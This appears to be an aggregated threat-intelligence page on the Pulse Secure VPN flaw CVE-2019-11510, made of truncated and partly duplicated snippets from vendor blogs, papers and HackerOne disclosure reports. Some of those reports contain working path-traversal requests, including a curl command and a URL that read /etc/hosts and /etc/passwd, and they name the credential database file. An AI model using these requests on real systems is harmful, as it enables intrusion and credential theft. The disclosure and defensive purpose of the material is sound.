Vulnerable Private Networks: Corporate VPNs Exploited in the Wild
blogs_volexity·2019-09-11·CVSS 10.0
[CRITICAL] Vulnerable Private Networks: Corporate VPNs Exploited in the Wild
Threat Intelligence
# Vulnerable Private Networks: Corporate VPNs Exploited in the Wild
September 11, 2019
Sean Koessel and Steven Adair
The details of multiple, critical Pulse Secure SSL VPN vulnerabilities are well known; they were disclosed in detail by two security researchers as part of a talk at Black Hat USA 2019 on August 7, 2019. What has not been widely covered, but should come as no surprise, is that APT actors have been actively exploiting these vulnerabilities in order to gain access to targeted networks. The vulnerability being exploited is CVE-2019-11510, which allows a remote unauthenticated attacker to send specially crafted requests that allow read access of arbitrary files on the Pulse Secure VPN. This includes access to databases that the VPN server uses to track se
Volexity
Vulnerable Private Networks: Corporate VPNs Exploited in the Wild
blogs_volexity·2019-09-11·CVSS 10.0
[CRITICAL] Vulnerable Private Networks: Corporate VPNs Exploited in the Wild
Threat Intelligence
## Vulnerable Private Networks: Corporate VPNs Exploited in the Wild
September 11, 2019
Sean Koessel and Steven Adair
The details of multiple, critical Pulse Secure SSL VPN vulnerabilities are well known; they were disclosed in detail by two security researchers as part of a talk at Black Hat USA 2019 on August 7, 2019. What has not been widely covered, but should come as no surprise, is that APT actors have been actively exploiting these vulnerabilities in order to gain access to targeted networks. The vulnerability being exploited is CVE-2019-11510 , which allows a remote unauthenticated attacker to send specially crafted requests that allow read access of arbitrary files on the Pulse Secure VPN. This includes access to databases that the VPN server uses to track
Tenable
CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
blogs_tenable·2019-08-27·CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2019-11510: Proof of Concept Available for Arbitrary File Disclosure in Pulse Connect Secure
blogs_tenable·2019-08-21·CVSS 10.0
[CRITICAL] CVE-2019-11510: Proof of Concept Available for Arbitrary File Disclosure in Pulse Connect Secure
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Threat Intel
APT29 (APT29, IRON RITUAL, IRON HEMLOCK)
threat_intel
APT29 (APT29, IRON RITUAL, IRON HEMLOCK)
# Threat Actor Profile: APT29
ATT&CK ID: G0016
Also known as: APT29, IRON RITUAL, IRON HEMLOCK, NobleBaron, Dark Halo, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke, SolarStorm, Blue Kitsune, UNC3524, Midnight Blizzard
Suspected origin: Russia
## Overview
APT29 is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DN
Recorded Future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
blogs_recorded_future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
# Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
In response to the COVID-19 pandemic, many organizations have shifted to working from home for the foreseeable future — this means that organizations will have a largely (or entirely) remote workforce for the first time.
This creates a situation that is ripe for cybercriminals and nation-state actors to exploit. As we have observed with the rapid adoption of COVID-19-themed scams and attacks against the Olympics, threat actors — both nation-state and cybercriminal — are quick to exploit new and evolving situations.
For security teams, the sudden change in an organization’s network topology means a vastly expanded attack surface with little time to adapt to the new reality. For employees, generally,
Sentinelone
NetWalker
blogs_sentinelone·CVSS 10.0
[CRITICAL] NetWalker
# NetWalker Ransomware: In-Depth Analysis, Detection, Mitigation, and Removal
## Summary of NetWalker Ransomware
NetWalker ransomware, also known as Mailto, was first seen in mid-2019. It started out as a private service, but eventually switched to a Ransomware-as-a-Service model, which made it more accessible. During the pandemic, NetWalker was especially known for targeting medical and healthcare facilities. It also uses double extortion tactics, asking for payment for a decryptor as well as a promise not to release any stolen data.
## What Does NetWalker Ransomware Target?
NetWalker ransomware has impacted a wide range of victims, including companies, municipalities, hospitals, law enforcement, emergency services, school districts, colleges, and universities. The healthcare sector h
Sentinelone
REvil
blogs_sentinelone
REvil
# REvil Ransomware: In-Depth Analysis, Detection, and Mitigation
As if ransomware itself wasn’t dangerous enough, a new type of attack involving ransomware is making waves in the cybersecurity community. Ransomware-as-a-Service (RaaS) operations are becoming more common and more profitable for threat actors looking to launch a variety of attacks. One such operation is known as REvil, and involved a core team of threat actors offering the malware to other attackers for a price.
Although the Russian Federal Security Service claims to have dismantled REvil and charged several of the ransomware group’s members, a deeper look at this type of ransomware and RaaS can help organizations protect themselves against these types of attacks in the future.
## What Is REvil Ransomware?
REvil ransomwa
Sentinelone
Maze
blogs_sentinelone
Maze
# Maze Ransomware: In-Depth Analysis, Detection, and Mitigation
Since its discovery in 2019, Maze ransomware has consistently made headlines due to its infamous attacks on MSPs and its ability move laterally to other networks. Although this particular strain of ransomware has been used to attack businesses and governmental organizations, its attacks on MSPs are worrying since a single compromise can create a cascade effect on the MSP’s clients, their business partners, and so on.
Maze was reportedly shut down in 2020, but there still exist numerous similar ransomware strains posing threats to businesses around the world today. A deeper understanding of Maze ransomware may help organizations strengthen their cybersecurity defenses against similar types of ransomware attacks in the future.
Recorded Future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
blogs_recorded_future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
## Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
In response to the COVID-19 pandemic, many organizations have shifted to working from home for the foreseeable future — this means that organizations will have a largely (or entirely) remote workforce for the first time.
This creates a situation that is ripe for cybercriminals and nation-state actors to exploit. As we have observed with the rapid adoption of COVID-19-themed scams and attacks against the Olympics , threat actors — both nation-state and cybercriminal — are quick to exploit new and evolving situations.
For security teams, the sudden change in an organization’s network topology means a vastly expanded attack surface with little time to adapt to the new reality. For employees, generally
Recorded Future
In Before The Lock: ESXi | Recorded Future
blogs_recorded_future
In Before The Lock: ESXi | Recorded Future
## In Before The Lock: ESXi
## Executive Summary
As organizations continue virtualizing their critical infrastructure and business systems, threat actors deploying ransomware have responded in kind. Between 2021 and 2022 we observed an approximately 3-fold increase in ransomware targeting ESXi , with offerings available from many groups including ALPHV, LockBit, and BlackBasta. We identified and described detection strategies for multiple TTPs that are often seen prior to the dropping of the ransomware payload in order to create detections and mitigations that are based on real-world, threat-actor use of these tools. In addition to providing tool-specific detections such as YARA and Sigma rules, we also identified detections for common enumeration, exploitation, and persistence technique
Huntress
The Top Four CVEs Attackers Exploit | Huntress
blogs_huntress·CVSS 9.8
[CRITICAL] The Top Four CVEs Attackers Exploit | Huntress
While the move to remote work last year gave many of us comforts such as working in our pajamas and being 10 steps away from the fridge, it’s been a bit of a nightmare for those who work in cybersecurity.
The Institute for Security and Technology reports that in 2020, the victims of ransomware attacks paid $350M in ransom—a more than 300% increase over the previous year. By this year’s end, it’s predicted that cybercrime will cost the world $6 trillion. While cybercrime is a lucrative gig for hackers, it's expensive for the rest of us—and unfortunately, it's only getting worse with remote work.
In many ways, remote work has removed many of the security measures that organizations typically put in place to keep their data and networks secure. For example, corporate networks usually only a
Recorded Future
In Before The Lock: ESXi
blogs_recorded_future
In Before The Lock: ESXi
# In Before The Lock: ESXi
Editor’s Note: This is an excerpt of a full report. To read the entire analysis with endnotes, click here to download the report as a PDF.
## Executive Summary
As organizations continue virtualizing their critical infrastructure and business systems, threat actors deploying ransomware have responded in kind. Between 2021 and 2022 we observed an approximately 3-fold increase in ransomware targeting ESXi, with offerings available from many groups including ALPHV, LockBit, and BlackBasta. We identified and described detection strategies for multiple TTPs that are often seen prior to the dropping of the ransomware payload in order to create detections and mitigations that are based on real-world, threat-actor use of these tools. In addition to providing tool-speci
arXiv
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
arxiv_fulltext·2025-02-16
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
Yuning Jiang
[email protected]
0000-0003-4791-8452
National University of Singapore
Singapore
Nay Oo
[email protected]
NCS Cyber Special Ops R&D
Singapore
Qiaoran Meng
[email protected]
National University of Singapore
Singapore
Hoon Wei Lim
[email protected]
NCS Cyber Special Ops R&D
Singapore
Biplab Sikdar
[email protected]
National University of Singapore
Singapore
Jiang et al.
## Abstract
As interconnected systems proliferate, safeguarding complex infrastructures against an escalating array of cyber threats has become an urgent challenge. The growing number of vulnerabilities, coupled with resource constraints, makes addressing every vulnerability impractical, thereby rende
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext·2024-07-31
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Raveen Kanishka Jayalath*
University of Adelaide, Australia
[email protected]
Hussain Ahmad* *Authors contributed equally to this work. Corresponding author.
University of Adelaide, Australia
[email protected]
Diksha Goel
CSIRO's Data61, Australia
[email protected]
3cmMuhammad Shuja Syed
3cmSLB, USA
[email protected]
Faheem Ullah
University of Adelaide, Australia
[email protected]
plain
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
arXiv
Dynamic Vulnerability Criticality Calculator for Industrial Control Systems
arxiv_fulltext·2024-03-20
Dynamic Vulnerability Criticality Calculator for Industrial Control Systems
Dynamic Vulnerability Criticality Calculator for Industrial Control Systems
Pavlos Cheimonidis addr1,e1
Kontantinos Rantos addr1,e2
e1e-mail: [email protected]
e2e-mail: [email protected]
Department of Computer Science, International Hellenic University, 654 04 Kavala, Greece
Received: date / Accepted: date
## Abstract
The convergence of information and communication technologies has introduced new and advanced capabilities to Industrial Control Systems. However, concurrently, it has heightened their vulnerability to cyber attacks. Consequently, the imperative for new security methods has emerged as a critical need for these organizations to effectively identify and mitigate potential threats. This paper introduces an innovative approach by proposing a dynamic vulnerability critical
HackerOne
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
hackerone·2024-06-18·CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
##Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that `https://██████████` instance is vulnerable to described vulnerabilities.
##POC
Reading `/etc/p
HackerOne
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
hackerone·2021-07-29·CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
##Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that `https://██████████` instance is vulnerable to described vulnerabilities.
##POC
Reading `/etc/passwd` v
HackerOne
Command Injection (via CVE-2019-11510 and CVE-2019-11539)
hackerone·2020-05-07·CVSS 10.0
CVE-2019-11510 [CRITICAL] Command Injection (via CVE-2019-11510 and CVE-2019-11539)
Command Injection (via CVE-2019-11510 and CVE-2019-11539)
**Summary:**
The Navy has a Pulse Secure SSL VPN (https://████████/dana-na/auth/url_default/welcome.cgi) that is vulnerable to:
CVE-2019-11510 - Pre-auth Arbitrary File Reading
CVE-2019-11539 - Post-auth Command Injection
vulnerable hostname from ssl certificate: ██████████.navy.mil
The pre-auth arbitrary file reading vulnerability (CVE-2019-11510) enables an un-authenicated user to read the file /data/runtime/mtmp/lmdb/dataa/data.mdb from the Pulse VPN device. This files contains admin and other users credentials in plain-text format. This information can be used to log into the pulse device as an administrator.
Once logged in as an administrator, the post-auth command injection vulnerability (CVE-2019-11539) allows an attacker
HackerOne
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
hackerone·2019-12-02·CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
##Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that https://████ instance is vulnerable to described vulnerabilities.
##POC
Extracting `/etc/passwd` as examp
HackerOne
[CVE-2019-11510 ] Path Traversal on ████████ leads to leaked passwords, RCE, etc
hackerone·2019-12-02·CVSS 10.0
CVE-2019-11510 [CRITICAL] [CVE-2019-11510 ] Path Traversal on ████████ leads to leaked passwords, RCE, etc
[CVE-2019-11510 ] Path Traversal on ████████ leads to leaked passwords, RCE, etc
**Summary / Description:**
█████ is vulnerable to Path Traversal which can lead to remote code execution.
## Impact
Critical
## Step-by-step Reproduction Instructions
1. Run the following `cURL` command to get the file `/etc/hosts`
```
curl --path-as-is -k -D- 'https://███████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'
```
```
## File generated by DSNet::Hosts::update at Thu Aug 1 13:24:40 2019
127.0.0.1 localhost
█████128.141 KMPC1_Node4
█████████252.82 acrcxznxx07d-10███
███████252.74 acrcxznxx06d-10███
███252.67 ODA-SCAN███
█████████252.65 ODA-VIP-1█████████
█████████252.63 ODA-1██████
███252.196 subversion████████
██████252.134 acrcxznxx07d-12██████
HackerOne
Pulse Secure File disclosure, clear text and potential RCE
hackerone·2019-12-02·CVSS 10.0
CVE-2019-11510 [CRITICAL] Pulse Secure File disclosure, clear text and potential RCE
Pulse Secure File disclosure, clear text and potential RCE
**Summary:**
Pulse Secure has two main vulnerabilities that allow file disclosure and post auth RCE
**Description:**
CVE-2019-11510 is a file disclosure due to some normalization issues in pulse secure. I was able to reproduce this by grabbing in the etc/passswd.
https://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#
Though the impact of that is very limited, medium to high sec at best. From here we can grab a specific file.
The file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear context passwords and usernames, when a user logs in from here we can then access the Pulse secure instance. I stopped here due to not wanting to break the rules of engagements but from here I woul
HackerOne
Potential pre-auth RCE on Twitter VPN
hackerone·2019-08-10·CVSS 7.2
[HIGH] Potential pre-auth RCE on Twitter VPN
Potential pre-auth RCE on Twitter VPN
Hi, we(Orange Tsai and Meh Chang) are the security research team from DEVCORE. Recently, we are doing a research about SSL VPN security, and found several critical vulnerabilities on Pulse Secure SSL VPN! We have reported to vendor and [patches](https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101) have been released on `2019/4/25`. Since that, we keep monitoring numerous large corporations using Pulse Secure and we noticed that Twitter haven't patched the SSL VPN server over one month!
These vulnerabilities include a pre-auth file reading(CVSS 10) and a post-auth(admin) command injection(CVSS 8.0) which can be chained into a pre-auth RCE! Here are all vulnerabilities we found:
* CVE-2019-11510 - Pre-auth Arbitrary File Reading
* CV
http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.htmlhttp://packetstormsecurity.com/files/154231/Pulse-Secure-SSL-VPN-File-Disclosure-NSE.htmlhttp://www.securityfocus.com/bid/108073https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdfhttps://kb.pulsesecure.net/?atype=sahttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/https://lists.apache.org/thread.html/ff5fa1837b6bd1b24d18a42faa75e165a4573dbe2d434910c15fd08a%40%3Cuser.guacamole.apache.org%3Ehttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0010https://www.kb.cert.org/vuls/id/927237http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.htmlhttp://packetstormsecurity.com/files/154231/Pulse-Secure-SSL-VPN-File-Disclosure-NSE.htmlhttp://www.securityfocus.com/bid/108073https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdfhttps://kb.pulsesecure.net/?atype=sahttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/https://lists.apache.org/thread.html/ff5fa1837b6bd1b24d18a42faa75e165a4573dbe2d434910c15fd08a%40%3Cuser.guacamole.apache.org%3Ehttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0010https://www.kb.cert.org/vuls/id/927237https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-11510
2019-05-08
Published
2021-11-03
Added to CISA KEV
Exploited in the wild